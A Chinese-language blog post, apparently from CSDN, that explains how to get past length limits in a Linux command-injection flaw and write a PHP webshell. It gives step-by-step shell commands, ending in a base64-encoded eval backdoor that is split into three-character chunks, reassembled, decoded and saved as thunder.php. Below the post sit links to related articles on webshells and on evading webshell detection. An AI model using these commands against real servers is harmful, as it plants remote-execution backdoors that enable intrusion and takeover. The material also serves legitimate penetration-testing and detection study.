Linux环境下绕过长度限制写入webshell

最新推荐文章于 2024-04-29 09:13:41 发布
最新推荐文章于 2024-04-29 09:13:41 发布
阅读量564 收藏
点赞数
分类专栏: # 命令执行漏洞 文章标签: 渗透测试 安全 linux waf绕过 命令执行 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/129176815
版权

前提

  • 当命令执行漏洞对长度有限制时,我们可以通过一些Linux命令生成文件进行执行。

  • 如果应用程序是使用shell解析器来执行命令或文件,那么不需要该文件具有执行属性(x)

  • 如果应用程序没有shell解析器,那么写入文件内容时,可以第一条语句写入#! /bin/sh,这样文件即使没有执行属性也可以执行

方法一:使用>>每次添加一部分命令到文件中

echo -n "cmd1" > r;
echo -n "cmd2" >> r;
echo -n "cmd3" >> r;
echo "cmd4" >> r;

  • 然后使用cat r | bash执行命令

方法二:使用换行执行和ls -t绕过长度限制

  • linux中,文件中的命令如果需要换行书写,需要在前一行末尾增加\,如文件a中有

ca\
t flag.t\
xt

  • 使用sh a即可执行命令cat flag.txt

方法三:命令通过base64编码输入

1、首先将我们的一句话话进行base64编码

echo "<?php @eval(\$_REQUEST[123]);?>" | base64
PD9waHAgQGV2YWwoJF9SRVFVRVNUWzEyM10pOz8+Cg==     //返回结果

2、依次每3个字符的写入到一个文件中

其中-n是令后面不会自动加入换行,方便拼接。 
echo -n PD9>a;
echo -n waH>b;
echo -n AgQ>c;
echo -n GV2>d;
echo -n YWw>e;
echo -n oJF>f;
echo -n 9SR>g;
echo -n VFV>h;
echo -n RVN>i;
echo -n UWz>j;
echo -n EyM>k;
echo -n 10p>l;
echo -n Oz8+>m;

3、然后组合刚才生成的这些文件到一个文件中。

cat a b>z;
cat z c>y;
cat y d>z;
cat z e>y;
cat y f>z;
cat z g>y;
cat y h>z;
cat z i>y;
cat y j>z;
cat z k>y;
cat y l>z;
cat z m>y;

4、将y里面的base64编码进行转回源码并且改名为php文件。

base64 -d y>x;
mv x thunder.php;

5、连接webshell进行测试,可以正常利用。

Thunderclap_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
命令执行漏洞多种写入webshell方式总结
Thunderclap的博客
02-24 2887
, 这些字符与双引号一起使用时具有特殊含义,并且在显示之前对其进行评估。单引号中的任何字符都没有特殊含义, 当你不想使用转义字符来更改 shell 脚本解释输入字符串参数方式时,就会很方便。简而言之,shell 将逐字解释单引号内的封闭文本,并且不会插入任何内容,包括变量、反引号、某些 \ 转义符等。在windows中,批处理需要转义字符主要有 “&”,“|”,“”等等,转义字符为”^”在Linux中,需要转义字符主要是 单引号 或者双引号 对于单引号,我们将其替换为\47即可。
Linux系统的PHP-Webshell后门实验
A0000FF的博客
04-02 887
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
通过代码执行命令执行Shell
hackzkaq的博客
08-10 4573
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 本文由团队手电筒分享,主要以干货为主-通过代码执行命令执行Shell,如果你还是个小白担心看不懂,没关系,“三步马””如何上传木马”“如何拿下服务器并妥善管理”等实战内容可以结合视频观看,视频演示先从原理,再到实操演示,一步步清晰明了,更易吸收视频扫码领取 PHP 一.命令执行 命令执行(注入)常见可控位置情况有下面几种: system("$arg"); //可控点直接是待执行的程序 如果我们能直接控制$arg,那么就能执行
命令执行Webshell总结
hackzkaq的博客
07-20 4895
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 前言 当我们找到一个rce漏洞却无法反弹shell时,在web路径webshell用连接工具进行管理会方便的多,本文总结从命令执行webshell的流程化操作。 寻找web路径 webshell当然要web路径,第一步要做的就是快速寻找web路径 1.文件查找法 一般web路径一定会有index.html\php\jsp\asp,login.xxx文件。可以根据已知页面文件名全局搜索 linux: find / -name ind
命令执行中对字符长度限制绕过解析
weixin_59419135的博客
02-14 1164
命令执行中对字符长度限制绕过解析,对限制长度为7,5,4的字符过滤进行绕过
linux下的webshell查杀工具
04-03
一款好用的linux下的webshell查杀软件。linux下的webshell查杀工具很少,所以这里分享出来。用于发现服务器上的web后门 官方网站地址:https://www.shellpub.com
Linux下基于SVM分类器的WebShell检测方法研究.pdf
09-06
【系统开发】在Linux环境下开发WebShell检测系统,需要考虑系统的实时性、稳定性和效率,以及应对不断演变的WebShell攻击策略。 【参考文献与专业指导】该研究引用了相关文献,并可能得到了专业人士的指导,以确保...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
webshellLINUX提权+留后门.txt
01-09
Linux系统安全学习
linux下用webshell对文件权限的修改.txt
01-09
Linux系统安全学习
Linux WebShell
07-30
WebShell
使用base64+gzinflate压缩编码来加密webshell
Fly_鹏程万里
04-07 989
压缩加密代码: <?php function encode_file_contents($filename) { $type=strtolower(substr(strrchr($filename,'.'),1)); if('php'==$type && is_file($filename) && is_writable($filename))...
可控字符串长度受限情况下GetShell
shiyingai
09-23 458
可控字符串长度受限情况下GetShell思路分析利用案例EXP 环境命令执行只允许输入七个字符,尝试写入webshell 思路分析   通过创建特殊的文件名(含有php代码),创建完后使用ls命令ls>0 (把当前目录下所有的文件名写入到文件0中)。   shell命令太长,受长度限制,可以使用 “” 来分割,实现换行输入,最后写入到一个新的文件,然后执行:sh 0。文件0 执行后产生 1.php 就是写入的php马。 注:要考虑写入的先后顺序问题,使用ls可以加上-t参数来排序(最新创建的在
linux 路径长度限制,操作系统对文件路径长度限制
weixin_30673719的博客
05-02 914
诸如EXT3文件系统的实现并不对文件路径的长度限制。即便NTFS,限制也相对宽松很多。但是,操作系统在设计时却加了些限制:“The on-disk structures have no inherent limit. Particular drivers and may impose limits of their own, however. MS-DOS does not support ...
linux怎么限制文件大小,Linux文件系统文件大小限制
weixin_34816557的博客
04-28 6486
去阿里面试,被问到了Linux文件系统中文件大小的限制,当时就无语了。学操作系统时这些都是现算的,回来赶紧查一下。以下为红帽ext3文件系统所支持的max file size和max filesystem size:ext3文件系统最大支持块数是2的32次方。块的大小可变,直接影响了文件系统的大小和文件的大小。上图所示为理论值,具体实现可能达不到,红帽Linux就没有达到,文件系统最大是16TB....
linux 系统安装webshell工具—蚁剑
RestoreJustice的博客
03-16 1945
中国蚁剑是一款跨平台且十分优秀的开源网站管理工具,面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。它集文件管理、虚拟终端、数据管理功能于一身,可在windows、linux和Mac上正常运行。是一款非常优秀的webshell管理工具。中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担并将追究其相关责任!
Cyberchef实战之-Webshell绕过还原揭秘之-base64编码和压缩编码
最新发布
村中少年的专栏
04-29 1136
介绍解析webshell常见的绕过手段,通过解析多层base64,压缩绕过的手段,扫清安全分析人员在日常的网络安全运营,护网,HVV,重保的过程中的障碍
LINUX提权入门手册
qq_52988816的博客
02-12 1317
简单介绍一下LINUX提权的大体结构和知识点
Linux基本指令(下)
南猿北者博客
11-17 3226
上一篇Linux基本指令主要讲解了关于文件操作方面的指令,接下来这一片Linux基本指令主要讲解一下关于文件内容方面的基本指令;
蚁剑绕过腾讯云webshell查杀
08-18
蚁剑是一种功能强大的网络攻击工具,可以用于绕过腾讯云等系统的WebShell查杀功能。 蚁剑的主要原理是通过传输恶意代码的方式绕过腾讯云的WebShell查杀机制。腾讯云的WebShell查杀功能通常是通过检测和过滤具有恶意代码特征的文件或代码来进行的。然而,蚁剑可以使用一些技术手段来隐藏恶意代码,使其不容易被腾讯云的查杀机制所发现。 首先,蚁剑可以对恶意代码进行加密或混淆处理。通过对代码进行加密或使用特定的编码方式,可以将恶意代码的内容变得晦涩难懂,使其难以被腾讯云查杀引擎所识别。 其次,蚁剑还可以利用一些反查杀技术来规避腾讯云的查杀机制。例如,蚁剑可以检测到目标系统上的查杀程序,并在检测到时自动切换为其他的隐藏模式,以避免被检测到和查杀。 此外,蚁剑还具有自动适应性的特点。它可以根据不同的环境和系统自动调整自身的工作方式,使其更加隐蔽和难以被腾讯云等WebShell查杀机制察觉。 然而,作为一个网络攻击工具,蚁剑违反了法律规定,并且会给网络系统的安全带来风险。因此,在任何情况下,我们都不鼓励和支持使用蚁剑等类似工具进行非法活动。维护网络安全,应该是我们的共同责任,我们应该遵守法律规定,不从事网络攻击和破坏行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值